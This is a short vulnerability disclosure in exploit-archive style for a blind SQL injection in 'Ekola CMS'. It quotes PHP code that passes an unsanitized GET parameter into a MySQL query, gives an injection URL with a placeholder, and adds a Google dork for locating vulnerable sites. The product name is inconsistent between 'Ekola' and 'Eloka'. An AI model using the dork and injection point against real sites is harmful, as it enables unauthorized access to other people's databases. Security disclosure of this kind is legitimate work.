facebook facebook twitter rss

Ekola CMS - Blind SQL Injection

Author: The UnKnØwN , Published: 21-09-2012
+-----------------------------------------------------------------------------+
¦ Ekola CMS - Blind SQL Injection ¦ _ ¦ - ¦ x ¦
+-----------------------------------------------------------------------------+
¦ ______ ______ _______ _______ _ _ ¦
¦ (_____ \(_____ (_______) (_______) | | (_) _ ¦
¦ _____) )_____) ) ___ _____ _ _ ____ | | ___ _ _| |_ ¦
¦ | __ /| ____/ | (_ | | ___) ( \ / ) _ \| |/ _ \| (_ _) ¦
¦ | | \ \| | | |___) | | |_____ ) x (| |_| | | |_| | | | |_ ¦
¦ |_| |_|_| \_____/ |_______|_/ \_) __/ \_)___/|_| \__) ¦
+-----------------------------------------------------------------------------+
¦ by The UnKnØwN ¦
+-----------------------------------------------------------------------------+
¦ greets to : KiMgX12 - Fawzi Coldfire - BenzØ - Soka - Hony - Pincki - ¦
¦ Linkce16 - Mooh Splinter - The Spark - F3i ¦
¦ The Crazy3D Team AND all algerian H4x0r$ ¦
+-----------------------------------------------------------------------------+
¦ [+] exploit title : Ekola cms - Blind SQL Injection ¦
¦ [+] date : 11-04-2012 ¦
¦ [+] author : The UnKnØwN ¦
¦ [+] version : 1 ¦
¦ [+] category : webapps ¦
¦ [+] google dork :intext:Eloka CMS © 2011 Design and Code by Nicow. ¦
¦ [+] tested on : windows xp ¦
+-----------------------------------------------------------------------------+
¦ Vulnerability Details ¦
+-----------------------------------------------------------------------------+
¦ Unprotected GET variable in "/pages/acheter.php" ¦

if (isset($_GET['objet']))
{
$error = FALSE;
if (!$connect) $error = 1; // test si connecté
if (!$error) // Test si l'objet existe
{
$rep = mysql_fetch_array(mysql_query("SELECT ID FROM boutique_objets WHERE ID='".$_GET['objet']."'"));



http://site/path/index.php?p=acheter&objet={Inject}&persoSelect=1



¦ Note : You must be conntected ¦
+-----------------------------------------------------------------------------+
¦ End ¦
+-----------------------------------------------------------------------------+

Like us on Facebook :